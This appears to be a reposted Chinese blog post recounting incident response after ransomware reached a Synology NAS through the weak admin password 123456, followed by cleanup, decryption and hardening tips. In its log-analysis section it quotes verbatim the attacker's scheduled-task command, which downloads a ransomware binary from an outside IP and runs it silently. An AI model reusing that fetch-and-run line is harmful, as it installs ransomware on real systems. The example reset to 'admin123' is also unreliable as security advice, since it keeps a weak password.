群暉是一種NAS（網(wǎng)絡(luò)附屬存儲）系統(tǒng)，在生活中主要扮演個人私有云角色，可以將文件存儲于 NAS，并通過網(wǎng)頁瀏覽器或手機(jī)應(yīng)用程序可實(shí)現(xiàn)存儲和共享，同時還提供的豐富應(yīng)用以方便管理應(yīng)用。借助群暉提供的 QuickConnect 快連服務(wù)，無需隨身攜帶存儲設(shè)備，即可以隨時隨地訪問NAS。因?yàn)檫@些優(yōu)點(diǎn)，群暉往往被當(dāng)做是NAS的首選。

但偏偏這次被上勒索病毒了，通過資料查詢發(fā)現(xiàn)該病毒早在2019年安全專家就已經(jīng)分析過并已提供預(yù)警信息，一旦感染，其中的文件都會被加密，并通過留下的文件索要比特幣。經(jīng)過初步判斷是通過web界面的弱口令進(jìn)去的，之后創(chuàng)建了一個定時任務(wù)從美國某個IP下載文件來執(zhí)行命令，并通過勒索病毒對文件進(jìn)行了加密且暫時未發(fā)現(xiàn)該病毒有橫向行動。本文主要記錄群暉中勒索病毒后的應(yīng)急響應(yīng)過程。

一、攻擊流程

（一）獲取攻擊目標(biāo)

目標(biāo)地址為http://x.x.x.x:5000，根據(jù)資料查詢?nèi)簳煹哪J(rèn)端口就是5000和5001，那么黑客應(yīng)該是有針對性地通過批量掃描對公網(wǎng)上的IP地址的5000以及5001端口進(jìn)行檢測，如果掃描到為群暉系統(tǒng)，那么就記錄下來保存結(jié)果

（二）實(shí)施弱口令爆破

通過工具對目標(biāo)站點(diǎn)的默認(rèn)管理賬號admin進(jìn)行爆破，通過admin/123456爆破進(jìn)入群暉NAS系統(tǒng)，并且黑客采取了動態(tài)切換代理IP的方式來提升我們的溯源難度。

（三）植入勒索病毒

以admin登錄后便植入了勒索病毒，加密硬盤數(shù)據(jù)（文件類型為encrypt）并留下了比特幣支付地址。

二、應(yīng)急流程

目標(biāo)群暉系統(tǒng)版本的DSM為6.2.3-25426，CPU為INTEL Celeron J3455，在公網(wǎng)上沒有已知漏洞存在能夠直接進(jìn)入目標(biāo)。

（一）修改密碼

既然知道了入侵源頭，那么先把弱口令修改掉，防止黑客再次通過弱口令登錄，可以通過web系統(tǒng)界面或服務(wù)器這兩種方式進(jìn)行修改

（1）直接修改密碼

將密碼修改為強(qiáng)口令，最好啟用2步驟驗(yàn)證來提高安全性

（2）在服務(wù)器中修改

1、在web界面開啟22端口

2、通過ssh登錄目標(biāo)群暉的admin賬戶（admin為群暉的默認(rèn)賬戶）
3、輸入以下命令，直接切換為root權(quán)限

sudo su -

4、輸入以下命令，修改密碼為admin123

synouser --setpw admin admin123

（二）日志分析

根據(jù)受害公司的反饋，他們是從7月29日發(fā)現(xiàn)文件被加密，而到了8月3日才尋求技術(shù)幫助，那么通過群暉自帶的日志中心可以發(fā)現(xiàn)在7月28日晚上11點(diǎn)19分有來自83.97.20.103通過登錄admin賬號

當(dāng)然溯源這個IP并沒有什么卵用，因?yàn)槭呛Ｍ獠⒁驯粯?biāo)記為代理、掃描地址

通過日志查詢還發(fā)現(xiàn)攻擊者在7月28日19分還創(chuàng)建了定時任務(wù)

執(zhí)行的具體命令如下，主要功能是進(jìn)入/tmp目錄下將crp_linux_386文件下載下來并賦予777權(quán)限輸出為386，通過nohub永久執(zhí)行386程序且不輸出任何信息到終端

cd /tmp && wget --no-check-certificate -O 386 http://98.144.56.47/1/crp_linux_386;chmod 0777 ./386;nohub ./386 --syno=true </dev/null> /dev/null 2>&1 &

在微步上查詢98.144.56.47，發(fā)現(xiàn)已標(biāo)識為勒索程序，數(shù)據(jù)解密的希望已經(jīng)十分渺茫

（三）病毒查殺

首先先將tmp目錄下的386文件刪除（但是未保存病毒原件，不能仔細(xì)分析該病毒，比較可惜），之后主要通過群暉自帶的插件Antivirus Essential查看在群暉中是否留有病毒

（1）下載Antivirus Essential

（2）全盤掃描

（3）隔離病毒

（四）數(shù)據(jù)解密

這個太有意思了，在第一天訪談之后，老板去找了淘寶上的店家破解，我一開始以為淘寶的店家真的那么牛，這種加密的數(shù)據(jù)都能破解，后來訪問了暗網(wǎng)的地址才發(fā)現(xiàn)，淘寶店家直接出錢買了解密工具，直接凈賺xxxx元。

復(fù)制一個加密文件通過下載的解密程序嘗試進(jìn)行解密，最后成功解密。解密過程如下：

.\decryptor_windows_x86.exe -s C:\test\

三、防范方法

1、停用默認(rèn)管理賬號admin，新建一個不同的賬號并分配管理權(quán)限

2、杜絕弱口令，設(shè)置強(qiáng)口令，可參考等保要求中的長度八位以上，由數(shù)字、字母、特殊字符構(gòu)成

3、修改默認(rèn)登錄端口，可修改如10000+以上的端口

4、開啟登錄失敗鎖定，對多次登錄失敗的IP進(jìn)行鎖定

5、安裝安全工具（安全顧問），定期更新補(bǔ)丁并升級版本

6、啟用防火墻，配置出入規(guī)則

7、文件版本回滾，能輕松將文件還原至感染前的狀態(tài)，可以有效防止因感染勒索病毒后文件無法訪問的情況

8、文件權(quán)限控制，在分享文件時設(shè)置訪問密碼、有效期等，并對文件權(quán)限進(jìn)行控制

總結(jié)

以上是生活随笔為你收集整理的一次群晖中勒索病毒后的应急响应的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。